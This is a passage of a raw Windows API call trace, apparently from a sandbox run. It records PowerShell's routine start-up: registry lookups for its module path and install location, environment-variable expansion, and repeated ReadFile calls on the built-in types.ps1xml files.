lpType=0x1ad34c, lpData=0x0, lpcbData=0x1ad348*=0x0 | out: lpType=0x1ad34c*=0x2, lpData=0x0, lpcbData=0x1ad348*=0x6c) returned 0x0 [0102.764] CoTaskMemAlloc (cb=0x70) returned 0x275810 [0102.764] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad31c, lpData=0x275810, lpcbData=0x1ad318*=0x6c | out: lpType=0x1ad31c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad318*=0x6c) returned 0x0 [0102.764] CoTaskMemFree (pv=0x275810) [0102.764] CoTaskMemAlloc (cb=0xcc) returned 0x2e9d60 [0102.764] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2e9d60, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0102.764] CoTaskMemFree (pv=0x2e9d60) [0102.764] CoTaskMemAlloc (cb=0xcc) returned 0x2e9d60 [0102.764] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e9d60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0102.764] CoTaskMemFree (pv=0x2e9d60) [0102.768] RegCloseKey (hKey=0x328) returned 0x0 [0102.768] CoTaskMemAlloc (cb=0xcc) returned 0x2e9d60 [0102.768] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e9d60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0102.769] CoTaskMemFree (pv=0x2e9d60) [0102.769] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3c8 | out: phkResult=0x1ad3c8*=0x328) returned 0x0 [0102.769] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad34c, lpData=0x0, lpcbData=0x1ad348*=0x0 | out: lpType=0x1ad34c*=0x0, lpData=0x0, lpcbData=0x1ad348*=0x0) returned 0x2 [0102.769] RegCloseKey (hKey=0x328) returned 0x0 [0102.785] CoTaskMemAlloc (cb=0x20c) returned 0x2ebde0 [0102.785] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ebde0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0102.787] CoTaskMemFree (pv=0x2ebde0) [0102.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1acf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0102.787] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0102.799] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.799] CoTaskMemFree (pv=0x1b7400b0) [0102.800] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.800] CoTaskMemFree (pv=0x1b7400b0) [0102.807] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.807] CoTaskMemFree (pv=0x1b7400b0) [0102.807] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.807] CoTaskMemFree (pv=0x1b7400b0) [0102.809] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad1b8 | out: phkResult=0x1ad1b8*=0x330) returned 0x0 [0102.810] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1ad1cc, lpData=0x0, lpcbData=0x1ad1c8*=0x0 | out: lpType=0x1ad1cc*=0x1, lpData=0x0, lpcbData=0x1ad1c8*=0x74) returned 0x0 [0102.811] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1ad13c, lpData=0x0, lpcbData=0x1ad138*=0x0 | out: lpType=0x1ad13c*=0x1, lpData=0x0, lpcbData=0x1ad138*=0x74) returned 0x0 [0102.811] CoTaskMemAlloc (cb=0x78) returned 0x275810 [0102.811] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1ad10c, lpData=0x275810, lpcbData=0x1ad108*=0x74 | out: lpType=0x1ad10c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad108*=0x74) returned 0x0 [0102.811] CoTaskMemFree (pv=0x275810) [0102.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0102.811] SetErrorMode (uMode=0x1) returned 0x1 [0102.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad090 | out: lpFileInformation=0x1ad090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0102.811] SetErrorMode (uMode=0x1) returned 0x1 [0102.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.812] SetErrorMode (uMode=0x1) returned 0x1 [0102.812] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad090 | out: lpFileInformation=0x1ad090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0102.812] SetErrorMode (uMode=0x1) returned 0x1 [0102.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0102.817] SetErrorMode (uMode=0x1) returned 0x1 [0102.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad090 | out: lpFileInformation=0x1ad090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0102.818] SetErrorMode (uMode=0x1) returned 0x1 [0102.818] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.819] CoTaskMemFree (pv=0x1b7400b0) [0102.820] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0102.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.820] CoTaskMemFree (pv=0x1b7400b0) [0102.821] GetACP () returned 0x4e4 [0102.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.833] SetErrorMode (uMode=0x1) returned 0x1 [0102.833] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0102.834] GetFileType (hFile=0x334) returned 0x1 [0102.834] SetErrorMode (uMode=0x1) returned 0x1 [0102.834] GetFileType (hFile=0x334) returned 0x1 [0102.835] ReadFile (in: hFile=0x334, lpBuffer=0x2d4ec70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4ec70*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.837] ReadFile (in: hFile=0x334, lpBuffer=0x2d4ec70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4ec70*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.838] ReadFile (in: hFile=0x334, lpBuffer=0x2d4ec70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4ec70*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.838] ReadFile (in: hFile=0x334, lpBuffer=0x2d4ec70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4ec70*, lpNumberOfBytesRead=0x1acfc8*=0xcf3, lpOverlapped=0x0) returned 1 [0102.839] ReadFile (in: hFile=0x334, lpBuffer=0x2d4e0cb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4e0cb*, lpNumberOfBytesRead=0x1acfc8*=0x0, lpOverlapped=0x0) returned 1 [0102.839] ReadFile (in: hFile=0x334, lpBuffer=0x2d4ec70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2d4ec70*, lpNumberOfBytesRead=0x1acfc8*=0x0, lpOverlapped=0x0) returned 1 [0102.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.842] SetErrorMode (uMode=0x1) returned 0x1 [0102.842] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acf40 | out: lpFileInformation=0x1acf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0102.842] SetErrorMode (uMode=0x1) returned 0x1 [0102.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.843] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad028 | out: phkResult=0x1ad028*=0x334) returned 0x0 [0102.843] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acfac, lpData=0x0, lpcbData=0x1acfa8*=0x0 | out: lpType=0x1acfac*=0x1, lpData=0x0, lpcbData=0x1acfa8*=0x56) returned 0x0 [0102.843] CoTaskMemAlloc (cb=0x5a) returned 0x2d9870 [0102.843] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acf7c, lpData=0x2d9870, lpcbData=0x1acf78*=0x56 | out: lpType=0x1acf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acf78*=0x56) returned 0x0 [0102.843] CoTaskMemFree (pv=0x2d9870) [0102.843] RegCloseKey (hKey=0x334) returned 0x0 [0102.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0102.883] GetSystemInfo (in: lpSystemInfo=0x1abc60 | out: lpSystemInfo=0x1abc60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0102.884] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0102.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0102.893] SetErrorMode (uMode=0x1) returned 0x1 [0102.893] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0102.893] GetFileType (hFile=0x334) returned 0x1 [0102.893] SetErrorMode (uMode=0x1) returned 0x1 [0102.893] GetFileType (hFile=0x334) returned 0x1 [0102.903] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.906] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.906] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.907] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.907] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.907] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.917] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: 